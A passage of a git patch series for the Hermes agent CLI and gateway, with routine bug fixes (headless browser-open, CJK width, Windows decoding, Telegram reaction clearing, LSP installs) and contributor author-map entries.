+        invoked without arguments — issue #24312."""
         names = {name for name, _ in telegram_bot_commands()}
-        assert "background" not in names
-        assert "queue" not in names
-        assert "steer" not in names
-        assert "background" in GATEWAY_KNOWN_COMMANDS
+        assert "background" in names
+        assert "queue" in names
+        assert "steer" in names
 
 
 class TestSlackSubcommandMap:

From 389c707e4285c864ac963c162c6875c600acd234 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:34:12 -0700
Subject: [PATCH 36/59] chore(release): add AUTHOR_MAP entry for ryptotalent

---
 scripts/release.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/scripts/release.py b/scripts/release.py
index 10a8918681f..ce359c386ee 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -144,6 +144,7 @@ AUTHOR_MAP = {
     "16263913+zccyman@users.noreply.github.com": "zccyman",
     "ahmetosrak@Ahmet-MacBook-Air.local": "Osraka",
     "98612432+Osraka@users.noreply.github.com": "Osraka",
+    "112634774+ryptotalent@users.noreply.github.com": "ryptotalent",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From d68a0ec3839fbe82d04a76bbba0a3f835f72ee15 Mon Sep 17 00:00:00 2001
From: hookinglau <270097726+hookinglau@users.noreply.github.com>
Date: Tue, 12 May 2026 16:35:46 -0700
Subject: [PATCH 37/59] fix(auxiliary): pass cfg_base_url and cfg_api_key when
 resolving task provider

_resolve_task_provider_model drops cfg_base_url and cfg_api_key when
returning a named provider, causing configured API keys and base URLs
to be lost. Pass them through so named providers can use custom
endpoints while still resolving credentials from provider-specific
env vars.

Closes #20139
---
 agent/auxiliary_client.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/agent/auxiliary_client.py b/agent/auxiliary_client.py
index da69f040bb1..377e4ba22ea 100644
--- a/agent/auxiliary_client.py
+++ b/agent/auxiliary_client.py
@@ -3828,7 +3828,7 @@ def _resolve_task_provider_model(
             # (e.g. OPENROUTER_API_KEY) instead of locking into "custom".
             return cfg_provider, resolved_model, cfg_base_url, None, resolved_api_mode
         if cfg_provider and cfg_provider != "auto":
-            return cfg_provider, resolved_model, None, None, resolved_api_mode
+            return cfg_provider, resolved_model, cfg_base_url, cfg_api_key, resolved_api_mode
 
         return "auto", resolved_model, None, None, resolved_api_mode
 

From b3ca6362a8629fb904f1136aecc139adf7b6794e Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:36:01 -0700
Subject: [PATCH 38/59] chore(release): add AUTHOR_MAP entry for hookinglau

---
 scripts/release.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/scripts/release.py b/scripts/release.py
index ce359c386ee..79e6e600d7d 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -145,6 +145,7 @@ AUTHOR_MAP = {
     "ahmetosrak@Ahmet-MacBook-Air.local": "Osraka",
     "98612432+Osraka@users.noreply.github.com": "Osraka",
     "112634774+ryptotalent@users.noreply.github.com": "ryptotalent",
+    "270097726+hookinglau@users.noreply.github.com": "hookinglau",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From e3858772d0465d2c5c386cb788642276138b5253 Mon Sep 17 00:00:00 2001
From: AllynSheep <5029547+AllynSheep@users.noreply.github.com>
Date: Tue, 12 May 2026 16:37:21 -0700
Subject: [PATCH 39/59] fix(dashboard): skip browser-open on headless Linux to
 prevent process exit

Fixes #24127

On headless Linux VPS (no DISPLAY or WAYLAND_DISPLAY), some Python
webbrowser backends register TUI programs such as links, lynx, or
www-browser.  GenericBrowser.open() spawns these without redirecting
stdin/stdout, allowing them to take over the terminal.  This can cause
the process to receive SIGHUP and exit immediately even though uvicorn
bound the port successfully, producing a misleading success message
followed by an empty --status.

Fix: detect headless Linux at startup and skip the auto-open when no
display server is available.  On such systems the URL is still printed
so the user can open it manually or via an SSH tunnel.  The webbrowser
call is also wrapped in a try/except so any unexpected failure on other
platforms is silently absorbed rather than surfacing as an unhandled
exception in the daemon thread.
---
 hermes_cli/web_server.py | 30 ++++++++++++++++++++++++++----
 1 file changed, 26 insertions(+), 4 deletions(-)

diff --git a/hermes_cli/web_server.py b/hermes_cli/web_server.py
index f1d14ebf48b..fb5f7ca12d3 100644
--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -4432,11 +4432,33 @@ def start_server(
     if open_browser:
         import webbrowser
 
-        def _open():
-            time.sleep(1.0)
-            webbrowser.open(f"http://{host}:{port}")
+        # On headless Linux (no DISPLAY or WAYLAND_DISPLAY) some registered
+        # browsers are TUI programs (links, lynx, www-browser) that try to
+        # take over the terminal.  That can send SIGHUP to the server process
+        # and cause an immediate exit even though uvicorn bound successfully.
+        # Skip the auto-open attempt on headless systems and let the user
+        # open the URL manually.  macOS and Windows are always considered
+        # display-capable.
+        _has_display = (
+            sys.platform != "linux"
+            or bool(os.environ.get("DISPLAY"))
+            or bool(os.environ.get("WAYLAND_DISPLAY"))
+        )
 
-        threading.Thread(target=_open, daemon=True).start()
+        if _has_display:
+            def _open():
+                try:
+                    time.sleep(1.0)
+                    webbrowser.open(f"http://{host}:{port}")
+                except Exception:
+                    pass
+
+            threading.Thread(target=_open, daemon=True).start()
+        else:
+            _log.debug(
+                "Skipping browser-open: no DISPLAY or WAYLAND_DISPLAY detected "
+                "(headless Linux). Pass --no-open to suppress this detection."
+            )
 
     print(f"  Hermes Web UI → http://{host}:{port}")
     uvicorn.run(app, host=host, port=port, log_level="warning")

From 782e3f516464946a62c925fcf4affd43c5d7f512 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:37:54 -0700
Subject: [PATCH 40/59] chore(release): add AUTHOR_MAP entries for AllynSheep

---
 scripts/release.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/scripts/release.py b/scripts/release.py
index 79e6e600d7d..5eb731f7855 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -146,6 +146,8 @@ AUTHOR_MAP = {
     "98612432+Osraka@users.noreply.github.com": "Osraka",
     "112634774+ryptotalent@users.noreply.github.com": "ryptotalent",
     "270097726+hookinglau@users.noreply.github.com": "hookinglau",
+    "5029547+AllynSheep@users.noreply.github.com": "AllynSheep",
+    "allyn0306@gmail.com": "AllynSheep",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From 80375cbe2c2d1da3d98558018fe357cfb9b85faa Mon Sep 17 00:00:00 2001
From: aqilaziz <46887634+aqilaziz@users.noreply.github.com>
Date: Tue, 12 May 2026 16:39:11 -0700
Subject: [PATCH 41/59] fix(dashboard): display real config path on Config page

Replace the hardcoded i18n placeholder "~/.hermes/config.yaml" with the
real config_path returned from api.getStatus(), falling back to the i18n
string while loading or on API failure.

Co-authored-by: aqilaziz <gonzes7@gmail.com>
---
 web/src/pages/ConfigPage.tsx | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/web/src/pages/ConfigPage.tsx b/web/src/pages/ConfigPage.tsx
index 66df9cd8f4d..ab402fb1563 100644
--- a/web/src/pages/ConfigPage.tsx
+++ b/web/src/pages/ConfigPage.tsx
@@ -118,6 +118,7 @@ export default function ConfigPage() {
   const [yamlText, setYamlText] = useState("");
   const [yamlLoading, setYamlLoading] = useState(false);
   const [yamlSaving, setYamlSaving] = useState(false);
+  const [configPath, setConfigPath] = useState<string | null>(null);
   const [activeCategory, setActiveCategory] = useState<string>("");
   const [confirmReset, setConfirmReset] = useState(false);
   const { toast, showToast } = useToast();
@@ -177,6 +178,10 @@ export default function ConfigPage() {
       .getDefaults()
       .then(setDefaults)
       .catch(() => {});
+    api
+      .getStatus()
+      .then((resp) => setConfigPath(resp.config_path))
+      .catch(() => {});
   }, []);
 
   // Set active category when categories load
@@ -416,7 +421,7 @@ export default function ConfigPage() {
         <div className="flex items-center gap-2">
           <Settings2 className="h-4 w-4 text-muted-foreground" />
           <code className="text-xs text-muted-foreground bg-muted/50 px-2 py-0.5">
-            {t.config.configPath}
+            {configPath ?? t.config.configPath}
           </code>
         </div>
         <div className="flex items-center gap-1.5">

From 6ec89d885d6087881811bfd2f77552fe30125531 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:39:51 -0700
Subject: [PATCH 42/59] chore(release): add AUTHOR_MAP entries for aqilaziz

---
 scripts/release.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/scripts/release.py b/scripts/release.py
index 5eb731f7855..e7b1a4893a1 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -148,6 +148,8 @@ AUTHOR_MAP = {
     "270097726+hookinglau@users.noreply.github.com": "hookinglau",
     "5029547+AllynSheep@users.noreply.github.com": "AllynSheep",
     "allyn0306@gmail.com": "AllynSheep",
+    "46887634+aqilaziz@users.noreply.github.com": "aqilaziz",
+    "gonzes7@gmail.com": "aqilaziz",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From 2a3140a814ed5a55af49672ba355783c948f0179 Mon Sep 17 00:00:00 2001
From: liuhao1024 <liuhao03@bilibili.com>
Date: Tue, 12 May 2026 21:57:34 +0800
Subject: [PATCH 43/59] fix(dashboard): rescan plugins when cached directory is
 removed

---
 hermes_cli/web_server.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/hermes_cli/web_server.py b/hermes_cli/web_server.py
index fb5f7ca12d3..3f0eae0aebc 100644
--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -4021,6 +4021,9 @@ def _get_dashboard_plugins(force_rescan: bool = False) -> list:
     global _dashboard_plugins_cache
     if _dashboard_plugins_cache is None or force_rescan:
         _dashboard_plugins_cache = _discover_dashboard_plugins()
+    elif _dashboard_plugins_cache:
+        if any(not Path(p["_dir"]).is_dir() for p in _dashboard_plugins_cache):
+            _dashboard_plugins_cache = _discover_dashboard_plugins()
     return _dashboard_plugins_cache
 
 

From d33deb7cbea17fbf5377c1e3f46f1016358fe88d Mon Sep 17 00:00:00 2001
From: laoli-no1 <6966326+laoli-no1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:42:01 -0700
Subject: [PATCH 44/59] fix(tui): clear scrollback buffer on startup to prevent
 tmux scrollback leakage

When TUI exits, tmux captures some TUI output into its scrollback buffer.
On restart, stale scrollback content appears at the top of screen before
AlternateScreen takes over.

Add ANSI escape sequences at startup:
- ESC[2J  clear visible screen
- ESC[H   cursor home
- ESC[3J  clear scrollback buffer
---
 ui-tui/src/entry.tsx | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/ui-tui/src/entry.tsx b/ui-tui/src/entry.tsx
index 31111d54686..cfb0cd2f3f0 100644
--- a/ui-tui/src/entry.tsx
+++ b/ui-tui/src/entry.tsx
@@ -20,6 +20,12 @@ if (!process.stdin.isTTY) {
 // terminal tab can still have mouse/focus/paste modes enabled.
 resetTerminalModes()
 
+// Clear visible screen + scrollback buffer. Without this, tmux may retain
+// stale TUI output in its scrollback buffer from the previous session,
+// which is visible when the user scrolls up or briefly before AlternateScreen
+// takes over on restart. See entry.tsx → AlternateScreen flow.
+process.stdout.write('\x1b[2J\x1b[H\x1b[3J')
+
 const gw = new GatewayClient()
 
 gw.start()

From b7bd0f77f3726a649502316ea3f1c71f24483b56 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:42:25 -0700
Subject: [PATCH 45/59] chore(release): add AUTHOR_MAP entries for laoli-no1

---
 scripts/release.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/scripts/release.py b/scripts/release.py
index e7b1a4893a1..95a2f717477 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -150,6 +150,8 @@ AUTHOR_MAP = {
     "allyn0306@gmail.com": "AllynSheep",
     "46887634+aqilaziz@users.noreply.github.com": "aqilaziz",
     "gonzes7@gmail.com": "aqilaziz",
+    "6966326+laoli-no1@users.noreply.github.com": "laoli-no1",
+    "laoli_no1@163.com": "laoli-no1",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From 7a4ad5ccb472eed67b4287a4df9d2abb12a2255c Mon Sep 17 00:00:00 2001
From: NorethSea <39730900+NorethSea@users.noreply.github.com>
Date: Tue, 12 May 2026 16:43:28 -0700
Subject: [PATCH 46/59] fix(cli): use display-width for response box header
 label to support CJK
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Replace `len(label)` with `HermesCLI._status_bar_display_width(label)`
in two places where the response box top border is rendered.

`len()` counts characters, not terminal columns. CJK characters like
`测` and `试` each occupy 2 columns, causing the top border
`╭─ 测试 ───╮` to render 2 columns wider than the bottom border
`╰─────────╯`.

The `_status_bar_display_width` helper already exists (line 2881) and
uses `prompt_toolkit.utils.get_cwidth` for proper CJK width calculation.
---
 cli.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cli.py b/cli.py
index 0666d74ba58..da2f32954ba 100644
--- a/cli.py
+++ b/cli.py
@@ -3669,7 +3669,7 @@ class HermesCLI:
             if self.show_timestamps:
                 label = f"{label} {datetime.now().strftime('%H:%M')}"
             w = shutil.get_terminal_size().columns
-            fill = w - 2 - len(label)
+            fill = w - 2 - HermesCLI._status_bar_display_width(label)
             _cprint(f"\n{_ACCENT}╭─{label}{'─' * max(fill - 1, 0)}╮{_RST}")
 
         self._stream_buf += text
@@ -10393,7 +10393,7 @@ class HermesCLI:
                         label = " ⚕ Hermes "
                         if self.show_timestamps:
                             label = f"{label}{datetime.now().strftime('%H:%M')} "
-                        fill = w - 2 - len(label)
+                        fill = w - 2 - HermesCLI._status_bar_display_width(label)
                         _cprint(f"\n{_ACCENT}╭─{label}{'─' * max(fill - 1, 0)}╮{_RST}")
                     _cprint(f"{_STREAM_PAD}{sentence.rstrip()}")
 

From c7cfad5d96cb25a8e532362948da250719d021f6 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:43:56 -0700
Subject: [PATCH 47/59] chore(release): add AUTHOR_MAP entries for NorethSea

---
 scripts/release.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/scripts/release.py b/scripts/release.py
index 95a2f717477..a6407b2c681 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -152,6 +152,8 @@ AUTHOR_MAP = {
     "gonzes7@gmail.com": "aqilaziz",
     "6966326+laoli-no1@users.noreply.github.com": "laoli-no1",
     "laoli_no1@163.com": "laoli-no1",
+    "39730900+NorethSea@users.noreply.github.com": "NorethSea",
+    "963979204@qq.com": "NorethSea",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From a33ec10874667469e037c5b0e4dbb1a9c2d3d794 Mon Sep 17 00:00:00 2001
From: JamesX88 <2283389+JamesX88@users.noreply.github.com>
Date: Tue, 12 May 2026 16:44:35 -0700
Subject: [PATCH 48/59] fix(cli): @-file completion crash on Windows when paths
 aren't cp1252-decodable

The fuzzy @-file completer shells out to 'rg --files' via subprocess.run
with text=True. On Windows, Python 3.13 decodes stdout using the system
ANSI codepage (cp1252), so any filename containing bytes like 0x81/0x8f
crashes the background reader thread with UnicodeDecodeError. The
exception is swallowed inside subprocess, leaving proc.stdout=None, and
the next line ('proc.stdout.strip()') blows up with:

  AttributeError: 'NoneType' object has no attribute 'strip'

This takes down the prompt_toolkit event loop and forces 'Press ENTER to
continue' until the user clears the @-query.

Fix:
- Pass encoding='utf-8', errors='replace' so rg's UTF-8 output is decoded
  consistently across platforms and unmappable bytes don't crash.
- Guard 'proc.stdout' with a None check before .strip(), so a future
  reader-thread failure degrades gracefully instead of breaking input.
---
 hermes_cli/commands.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/hermes_cli/commands.py b/hermes_cli/commands.py
index f071b2acac4..56a62c85a0a 100644
--- a/hermes_cli/commands.py
+++ b/hermes_cli/commands.py
@@ -1362,9 +1362,9 @@ class SlashCommandCompleter(Completer):
             try:
                 proc = subprocess.run(
                     cmd, capture_output=True, text=True, timeout=2,
-                    cwd=cwd,
+                    cwd=cwd, encoding="utf-8", errors="replace",
                 )
-                if proc.returncode == 0 and proc.stdout.strip():
+                if proc.returncode == 0 and proc.stdout and proc.stdout.strip():
                     raw = proc.stdout.strip().split("\n")
                     # Store relative paths
                     for p in raw[:5000]:

From 413990c94537e9c9da973bb21a6afcd332400b91 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:44:59 -0700
Subject: [PATCH 49/59] chore(release): add AUTHOR_MAP entries for JamesX88

---
 scripts/release.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/scripts/release.py b/scripts/release.py
index a6407b2c681..482bb911a21 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -154,6 +154,8 @@ AUTHOR_MAP = {
     "laoli_no1@163.com": "laoli-no1",
     "39730900+NorethSea@users.noreply.github.com": "NorethSea",
     "963979204@qq.com": "NorethSea",
+    "2283389+JamesX88@users.noreply.github.com": "JamesX88",
+    "JamesX88@users.noreply.github.com": "JamesX88",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From 6f285efb8058ee5bd1b91e4e0ba9187ec8b183e8 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 17:02:29 -0700
Subject: [PATCH 50/59] fix(telegram): clear in-progress reaction on cancelled
 processing (#24628)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

When the user runs /stop or a session is interrupted mid-flight, the
👀 in-progress reaction lingered on the user's message indefinitely.
Without another agent run to swap it for 👍/👎, the eyes stayed there
forever — visually misleading (looks like the agent is still working).

Fix: on ProcessingOutcome.CANCELLED, call set_message_reaction with
reaction=None to clear all reactions on the message. Documented Bot API
semantics (equivalent to Bot API 10.0's deleteMessageReaction, but works
on PTB 22.6 already without the version bump).

Test changes:
- Renamed test_on_processing_complete_cancelled_keeps_existing_reaction
  → test_on_processing_complete_cancelled_clears_reaction; updated
  assertion to expect set_message_reaction(reaction=None).
- Added test_on_processing_complete_cancelled_skipped_when_disabled
  (TELEGRAM_REACTIONS=false short-circuits).
- Added test_clear_reactions_handles_api_error_gracefully and
  test_clear_reactions_returns_false_without_bot to cover the new
  _clear_reactions helper.
---
 gateway/platforms/telegram.py            | 34 +++++++++++++++-
 tests/gateway/test_telegram_reactions.py | 49 +++++++++++++++++++++++-
 2 files changed, 80 insertions(+), 3 deletions(-)

diff --git a/gateway/platforms/telegram.py b/gateway/platforms/telegram.py
index a821160cfc8..415ddb5608b 100644
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -4761,6 +4761,27 @@ class TelegramAdapter(BasePlatformAdapter):
             logger.debug("[%s] set_message_reaction failed (%s): %s", self.name, emoji, e)
             return False
 
+    async def _clear_reactions(self, chat_id: str, message_id: str) -> bool:
+        """Clear all reactions from a Telegram message.
+
+        Calling ``set_message_reaction`` with ``reaction=None`` (or an empty
+        sequence) is the documented Bot API way to remove all bot-set
+        reactions on a message — equivalent to Bot API 10.0's
+        ``deleteMessageReaction`` but supported in PTB 22.6 already.
+        """
+        if not self._bot:
+            return False
+        try:
+            await self._bot.set_message_reaction(
+                chat_id=int(chat_id),
+                message_id=int(message_id),
+                reaction=None,
+            )
+            return True
+        except Exception as e:
+            logger.debug("[%s] clear reactions failed: %s", self.name, e)
+            return False
+
     async def on_processing_start(self, event: MessageEvent) -> None:
         """Add an in-progress reaction when message processing begins."""
         if not self._reactions_enabled():
@@ -4775,12 +4796,23 @@ class TelegramAdapter(BasePlatformAdapter):
 
         Unlike Discord (additive reactions), Telegram's set_message_reaction
         replaces all existing reactions in one call — no remove step needed.
+
+        On CANCELLED outcomes (e.g. the user runs ``/stop``, or a session is
+        interrupted mid-flight), we explicitly clear the 👀 in-progress
+        reaction so it doesn't linger on the user's message indefinitely.
+        Without this clear, the only way to remove the 👀 was to wait for
+        another agent run to swap it to 👍/👎 — which never happens if the
+        cancellation was the last activity in the chat.
         """
         if not self._reactions_enabled():
             return
         chat_id = getattr(event.source, "chat_id", None)
         message_id = getattr(event, "message_id", None)
-        if chat_id and message_id and outcome != ProcessingOutcome.CANCELLED:
+        if not (chat_id and message_id):
+            return
+        if outcome == ProcessingOutcome.CANCELLED:
+            await self._clear_reactions(chat_id, message_id)
+        else:
             await self._set_reaction(
                 chat_id,
                 message_id,
diff --git a/tests/gateway/test_telegram_reactions.py b/tests/gateway/test_telegram_reactions.py
index 143161e9b71..8b3b0686bb4 100644
--- a/tests/gateway/test_telegram_reactions.py
+++ b/tests/gateway/test_telegram_reactions.py
@@ -218,17 +218,62 @@ async def test_on_processing_complete_skipped_when_disabled(monkeypatch):
 
 
 @pytest.mark.asyncio
-async def test_on_processing_complete_cancelled_keeps_existing_reaction(monkeypatch):
-    """Expected cancellation should not replace the in-progress reaction."""
+async def test_on_processing_complete_cancelled_clears_reaction(monkeypatch):
+    """Cancelled processing should clear the in-progress reaction.
+
+    Without this clear, the 👀 reaction lingers on the user's message
+    indefinitely (until another agent run swaps it for 👍/👎). On a
+    ``/stop`` that ends a session, that reaction never gets cleaned up.
+    """
     monkeypatch.setenv("TELEGRAM_REACTIONS", "true")
     adapter = _make_adapter()
     event = _make_event()
 
     await adapter.on_processing_complete(event, ProcessingOutcome.CANCELLED)
 
+    # set_message_reaction with reaction=None clears all reactions on the
+    # message (Bot API documented semantics; equivalent to Bot API 10.0's
+    # deleteMessageReaction but works on PTB 22.6 already).
+    adapter._bot.set_message_reaction.assert_awaited_once_with(
+        chat_id=123,
+        message_id=456,
+        reaction=None,
+    )
+
+
+@pytest.mark.asyncio
+async def test_on_processing_complete_cancelled_skipped_when_disabled(monkeypatch):
+    """Cancelled processing should not call the API when reactions are off."""
+    monkeypatch.delenv("TELEGRAM_REACTIONS", raising=False)
+    adapter = _make_adapter()
+    event = _make_event()
+
+    await adapter.on_processing_complete(event, ProcessingOutcome.CANCELLED)
+
     adapter._bot.set_message_reaction.assert_not_awaited()
 
 
+@pytest.mark.asyncio
+async def test_clear_reactions_handles_api_error_gracefully(monkeypatch):
+    """API errors during clear should not propagate."""
+    monkeypatch.setenv("TELEGRAM_REACTIONS", "true")
+    adapter = _make_adapter()
+    adapter._bot.set_message_reaction = AsyncMock(side_effect=RuntimeError("no perms"))
+
+    result = await adapter._clear_reactions("123", "456")
+    assert result is False
+
+
+@pytest.mark.asyncio
+async def test_clear_reactions_returns_false_without_bot(monkeypatch):
+    """_clear_reactions should return False when bot is not available."""
+    adapter = _make_adapter()
+    adapter._bot = None
+
+    result = await adapter._clear_reactions("123", "456")
+    assert result is False
+
+
 # ── config.py bridging ───────────────────────────────────────────────
 
 

From 29c9ff9ba5d63bc81d53935c3f84f066673a06b2 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 17:02:35 -0700
Subject: [PATCH 51/59] fix(lsp): typescript SDK install + tsc-missing skip +
 shellcheck warning (#24630)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Three follow-ups to PR #24168 found during live E2E testing on TS/bash files:

1. typescript-language-server now installs the typescript SDK (tsserver)
   alongside it. Without that sibling install, initialize() failed with
   "Could not find a valid TypeScript installation" and the server was
   marked broken — no diagnostics ever reached the agent. New extra_pkgs
   field on INSTALL_RECIPES makes that explicit and reusable for future
   peer-dep cases.

2. _check_lint now treats "linter command exists on PATH but cannot
   actually run" as skipped instead of error. The motivating case is
   npx tsc when typescript is not in node_modules — npx prints its
   "This is not the tsc command you are looking for" banner and exits
   non-zero, which previously blocked the LSP semantic tier (gated on
   success or skipped). Pattern-matched per base command (npx,
   rustfmt, go) so genuine lint errors still flow through normally.

3. hermes lsp status now surfaces a Backend warnings section when
   bash-language-server is installed but shellcheck is missing. The
   server itself spawns fine but bash-language-server delegates
   diagnostics to shellcheck — without it on PATH the integration
   looks alive but never reports any problems. Same warning is
   logged once at server spawn time.

Validation:

- 12 new tests in tests/agent/lsp/test_install_and_lint_fixes.py:
    * recipe carries typescript SDK
    * _install_npm passes both pkg + extras to npm CLI
    * backwards compat: recipes without extras still work
    * _backend_warnings quiet when bash absent / both present
    * _backend_warnings fires when bash installed without shellcheck
    * status output includes the Backend warnings section
    * _looks_like_linter_unusable catches the npx tsc banner
    * real TS type errors not misclassified as unusable
    * unfamiliar linters fall through normally
    * _check_lint returns skipped on npx tsc unusable
    * _check_lint returns error on real tsc type errors
- Full lsp + file_operations test suite: 245/245 pass
- Live E2E:
    * try_install("typescript-language-server") installs both packages
      into node_modules
    * write_file(bad.ts, ...) returns lint=skipped + lsp_diagnostics
      with two real TS errors (was lint=error, no lsp_diagnostics)
    * hermes lsp status renders the shellcheck warning when bash is
      installed but shellcheck is not on PATH
---
 agent/lsp/cli.py                              |  38 +++
 agent/lsp/install.py                          |  41 ++-
 agent/lsp/servers.py                          |  15 +
 .../agent/lsp/test_install_and_lint_fixes.py  | 279 ++++++++++++++++++
 tools/file_operations.py                      |  67 +++++
 5 files changed, 434 insertions(+), 6 deletions(-)
 create mode 100644 tests/agent/lsp/test_install_and_lint_fixes.py

diff --git a/agent/lsp/cli.py b/agent/lsp/cli.py
index 97a52c7c76c..c17ef682b33 100644
--- a/agent/lsp/cli.py
+++ b/agent/lsp/cli.py
@@ -140,6 +140,17 @@ def _cmd_status(emit_json: bool) -> int:
         disabled = info.get("disabled_servers") or []
         if disabled:
             out.append(f"  disabled in cfg: {', '.join(disabled)}")
+
+    # Surface backend-tool gaps that aren't visible in the registry table:
+    # some servers spawn fine but emit no diagnostics without a sidecar
+    # binary (bash-language-server -> shellcheck).
+    backend_warnings = _backend_warnings()
+    if backend_warnings:
+        out.append("")
+        out.append("Backend warnings")
+        out.append("================")
+        for line in backend_warnings:
+            out.append(f"  ! {line}")
     out.append("")
     out.append("Registered Servers")
     out.append("==================")
@@ -268,3 +279,30 @@ def _recipe_pkg_for(server_id: str) -> str:
         "typescript": "typescript-language-server",
     }
     return aliases.get(server_id, server_id)
+
+
+def _backend_warnings() -> list:
+    """Return human-readable notes about LSP backend tools that are missing
+    in a way that won't surface elsewhere.
+
+    Some language servers ship as thin wrappers around an external CLI for
+    actual diagnostics — they spawn cleanly but never emit any errors when
+    the sidecar binary isn't on PATH.  bash-language-server / shellcheck
+    is the load-bearing example.
+
+    Returned strings are short, actionable, and include the install
+    suggestion across common platforms.
+    """
+    import shutil as _shutil
+    from agent.lsp.install import hermes_lsp_bin_dir
+    notes: list = []
+    bash_installed = _shutil.which("bash-language-server") is not None or (
+        (hermes_lsp_bin_dir() / "bash-language-server").exists()
+    )
+    if bash_installed and _shutil.which("shellcheck") is None:
+        notes.append(
+            "bash-language-server is installed but shellcheck is missing — "
+            "diagnostics will be empty (apt: shellcheck, brew: shellcheck, "
+            "scoop: shellcheck)."
+        )
+    return notes
diff --git a/agent/lsp/install.py b/agent/lsp/install.py
index 5b5717dc014..0aaa22be744 100644
--- a/agent/lsp/install.py
+++ b/agent/lsp/install.py
@@ -33,7 +33,7 @@ import subprocess
 import sys
 import threading
 from pathlib import Path
-from typing import Dict, Optional
+from typing import Any, Dict, Optional
 
 logger = logging.getLogger("agent.lsp.install")
 
@@ -41,7 +41,13 @@ logger = logging.getLogger("agent.lsp.install")
 # tuple of strategy name + package name + executable name.  When the
 # install completes, we look for the executable in
 # ``<HERMES_HOME>/lsp/bin/`` first, then on PATH.
-INSTALL_RECIPES: Dict[str, Dict[str, str]] = {
+#
+# Optional fields:
+#   - ``extra_pkgs``: list of sibling packages to install alongside
+#     ``pkg`` in the same node_modules tree.  Used when an LSP server
+#     has a runtime peer dependency that npm doesn't auto-pull (e.g.
+#     typescript-language-server needs ``typescript``).
+INSTALL_RECIPES: Dict[str, Dict[str, Any]] = {
     # Python
     "pyright": {"strategy": "npm", "pkg": "pyright", "bin": "pyright-langserver"},
     # JS/TS family
@@ -49,6 +55,11 @@ INSTALL_RECIPES: Dict[str, Dict[str, str]] = {
         "strategy": "npm",
         "pkg": "typescript-language-server",
         "bin": "typescript-language-server",
+        # typescript-language-server requires the `typescript` SDK
+        # (tsserver) to be importable from the same node_modules tree;
+        # otherwise initialize() fails with "Could not find a valid
+        # TypeScript installation".  Install them together.
+        "extra_pkgs": ["typescript"],
     },
     "@vue/language-server": {
         "strategy": "npm",
@@ -179,7 +190,11 @@ def _do_install(pkg: str) -> Optional[str]:
         return None
 
     if strategy == "npm":
-        return _install_npm(recipe.get("pkg", pkg), bin_name)
+        return _install_npm(
+            recipe.get("pkg", pkg),
+            bin_name,
+            extra_pkgs=recipe.get("extra_pkgs") or [],
+        )
     if strategy == "go":
         return _install_go(recipe.get("pkg", pkg), bin_name)
     if strategy == "pip":
@@ -189,22 +204,36 @@ def _do_install(pkg: str) -> Optional[str]:
     return None
 
 
-def _install_npm(pkg: str, bin_name: str) -> Optional[str]:
+def _install_npm(
+    pkg: str,
+    bin_name: str,
